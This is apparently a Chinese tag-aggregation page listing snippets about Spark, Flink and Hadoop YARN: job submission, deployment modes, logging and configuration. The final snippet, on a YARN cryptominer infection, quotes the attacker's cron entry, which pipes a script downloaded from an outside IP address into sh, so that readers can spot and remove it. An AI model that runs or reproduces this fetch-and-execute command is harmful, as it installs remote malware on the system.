yarn | 易学教程

Spark - Call Spark jar from java with arguments [closed]

阅读更多关于 Spark - Call Spark jar from java with arguments [closed]

问题 Closed . This question needs to be more focused. It is not currently accepting answers. Want to improve this question? Update the question so it focuses on one problem only by editing this post. Closed 2 years ago . I would like to call spark jar from java (to run spark process on yarn), and try to use this link code. It looks fit in my case, but I need to pass hashmap and some java values to spakr jar. Is it able to pass java object to spark jar? And is java side able to know how mush spark

spark - application returns different results based on different executor memory?

阅读更多关于 spark - application returns different results based on different executor memory?

I am noticing some peculiar behaviour, i have spark job which reads the data and does some grouping ordering and join and creates an output file. The issue is when I run the same job on yarn with memory more than what the environment has eg the cluster has 50 GB and i submit spark-submit with close to 60 GB executor and 4gb driver memory. My results gets decreased seems like one of the data partitions or tasks are lost while processing. driver-memory 4g --executor-memory 4g --num-executors 12 I also notice the warning message on driver - WARN util.Utils: Truncated the string representation of

Flink架构、原理与部署测试

阅读更多关于 Flink架构、原理与部署测试

Apache Flink是一个面向分布式数据流处理和批量数据处理的开源计算平台，它能够基于同一个Flink运行时，提供支持流处理和批处理两种类型应用的功能。现有的开源计算方案，会把流处理和批处理作为两种不同的应用类型，因为它们所提供的SLA（Service-Level-Aggreement）是完全不相同的：流处理一般需要支持低延迟、Exactly-once保证，而批处理需要支持高吞吐、高效处理。 Flink从另一个视角看待流处理和批处理，将二者统一起来：Flink是完全支持流处理，也就是说作为流处理看待时输入数据流是无界的；批处理被作为一种特殊的流处理，只是它的输入数据流被定义为有界的。 Flink流处理特性：支持高吞吐、低延迟、高性能的流处理支持带有事件时间的窗口（Window）操作支持有状态计算的Exactly-once语义支持高度灵活的窗口（Window）操作，支持基于time、count、session，以及data-driven的窗口操作支持具有Backpressure功能的持续流模型支持基于轻量级分布式快照（Snapshot）实现的容错一个运行时同时支持Batch on Streaming处理和Streaming处理 Flink在JVM内部实现了自己的内存管理支持迭代计算支持程序自动优化：避免特定情况下Shuffle、排序等昂贵操作

Apache Flink：特性、概念、组件栈、架构及原理分析

阅读更多关于 Apache Flink：特性、概念、组件栈、架构及原理分析

Apache Flink是一个面向分布式数据流处理和批量数据处理的开源计算平台，它能够基于同一个Flink运行时（Flink Runtime），提供支持流处理和批处理两种类型应用的功能。现有的开源计算方案，会把流处理和批处理作为两种不同的应用类型，因为他们它们所提供的SLA是完全不相同的：流处理一般需要支持低延迟、Exactly-once保证，而批处理需要支持高吞吐、高效处理，所以在实现的时候通常是分别给出两套实现方法，或者通过一个独立的开源框架来实现其中每一种处理方案。例如，实现批处理的开源方案有MapReduce、Tez、Crunch、Spark，实现流处理的开源方案有Samza、Storm。 Flink在实现流处理和批处理时，与传统的一些方案完全不同，它从另一个视角看待流处理和批处理，将二者统一起来：Flink是完全支持流处理，也就是说作为流处理看待时输入数据流是无界的；批处理被作为一种特殊的流处理，只是它的输入数据流被定义为有界的。基于同一个Flink运行时（Flink Runtime），分别提供了流处理和批处理API，而这两种API也是实现上层面向流处理、批处理类型应用框架的基础。基本特性关于Flink所支持的特性，我这里只是通过分类的方式简单做一下梳理，涉及到具体的一些概念及其原理会在后面的部分做详细说明。流处理特性支持高吞吐、低延迟、高性能的流处理

Spark集群三种部署模式的区别

阅读更多关于 Spark集群三种部署模式的区别

Spark最主要资源管理方式按排名为Hadoop Yarn, Apache Standalone 和Mesos。在单机使用时，Spark还可以采用最基本的local模式。目前Apache Spark支持三种分布式部署方式，分别是standalone、spark on mesos和 spark on YARN，其中，第一种类似于MapReduce 1.0所采用的模式，内部实现了容错性和资源管理，后两种则是未来发展的趋势，部分容错性和资源管理交由统一的资源管理系统完成：让Spark运行在一个通用的资源管理系统之上，这样可以与其他计算框架，比如MapReduce，公用一个集群资源，最大的好处是降低运维成本和提高资源利用率（资源按需分配）。本文将介绍这三种部署方式，并比较其优缺点。 1. Standalone模式即独立模式，自带完整的服务，可单独部署到一个集群中，无需依赖任何其他资源管理系统。从一定程度上说，该模式是其他两种的基础。借鉴Spark开发模式，我们可以得到一种开发新型计算框架的一般思路：先设计出它的standalone模式，为了快速开发，起初不需要考虑服务（比如master/slave）的容错性，之后再开发相应的wrapper，将stanlone模式下的服务原封不动的部署到资源管理系统yarn或者mesos上，由资源管理系统负责服务本身的容错

Yarn parsing job logs stored in hdfs

阅读更多关于 Yarn parsing job logs stored in hdfs

Is there any parser, which I can use to parse the json present in yarn job logs(jhist files) which gets stored in hdfs to extract information from it. The second line in the .jhist file is the avro schema for the other jsons in the file. Meaning that you can create avro data out of the jhist file. For this you could use avro-tools-1.7.7.jar # schema is the second line sed -n '2p;3q' file.jhist > schema.avsc # removing the first two lines sed '1,2d' file.jhist > pfile.jhist # finally converting to avro data java -jar avro-tools-1.7.7.jar fromjson pfile.jhist --schema-file schema.avsc > file

Spark Submit Issue

阅读更多关于 Spark Submit Issue

问题 I am trying to run a fat jar on a Spark cluster using Spark submit. I made the cluster using "spark-ec2" executable in Spark bundle on AWS. The command I am using to run the jar file is bin/spark-submit --class edu.gatech.cse8803.main.Main --master yarn-cluster ../src1/big-data-hw2-assembly-1.0.jar In the beginning it was giving me the error that at least one of the HADOOP_CONF_DIR or YARN_CONF_DIR environment variable must be set. I didn't know what to set them to, so I used the following

hadoop2.7.2基本配置（yarn）模式

阅读更多关于 hadoop2.7.2基本配置（yarn）模式

环境配置 a）.安装oracle jdk并配置好JAVA_HOME，将如下代码追加到/etc/profile文件末尾 export JAVA_HOME=/usr/local/jdk1.8.0_73 export JRE_HOME=${JAVA_HOME}/jre export CLASSPATH=.:${JAVA_HOME}/lib:${JRE_HOME}/lib export PATH=$PATH:${JAVA_HOME}/bin 不要忘了source /etc/profile哦！ b）.创建hadoop用户 # 创建hadoop用户 useradd -m hadoop #设置hadoop用户密码 passwd hadoop 切换到hadoop用户下将下载hadoop2.7.2压缩包上传至服务器并解压到/home/hadoop/hadoop-2.7.2目录， a).将hadoop的bin配置到环境变量中，追加到/etc/profile文件末尾 export HADOOP_HOME=/home/hadoop/hadoop-2.7.2 export PATH=$PATH:${HADOOP_HOME}/bin:${HADOOP_HOME}/sbin b).进入hadoop_home/etc/hadoop/目录，修改如下文件内容 1.修改hadoop-env.sh文件，配置JAVA

Spark File Logger in Yarn Mode

阅读更多关于 Spark File Logger in Yarn Mode

问题 I want to create a custom logger that writes from messages from executors in a specific folder in a cluster node. I have edited my log4j.properties file in SPARK_HOME/conf/ like this: log4j.rootLogger=${root.logger} root.logger=WARN,console log4j.appender.console=org.apache.log4j.ConsoleAppender log4j.appender.console.target=System.err log4j.appender.console.layout=org.apache.log4j.PatternLayout log4j.appender.console.layout.ConversionPattern=%d{yy/MM/dd HH:mm:ss} %p %c{2}: %m%n shell.log

YARN Dr.who Application Attempt appattempt fail

阅读更多关于 YARN Dr.who Application Attempt appattempt fail

问题 I am getting this error msg in my hadoop cluster. Can someone explain me why ? Somehow more the 2000 job applications are getting created and failing without any reason. 回答1: This might be a hack... There is a cryptocurrency miner that creates thousands of jobs like this. Check for cron jobs as yarn on each node that are suspicious and remove them. $ sudo -u yarn crontab -e */2 * * * * wget -q -O - http://185.222.210.59/cr.sh | sh > /dev/null 2>&1 Then check for a "java" process like this one

订阅 yarn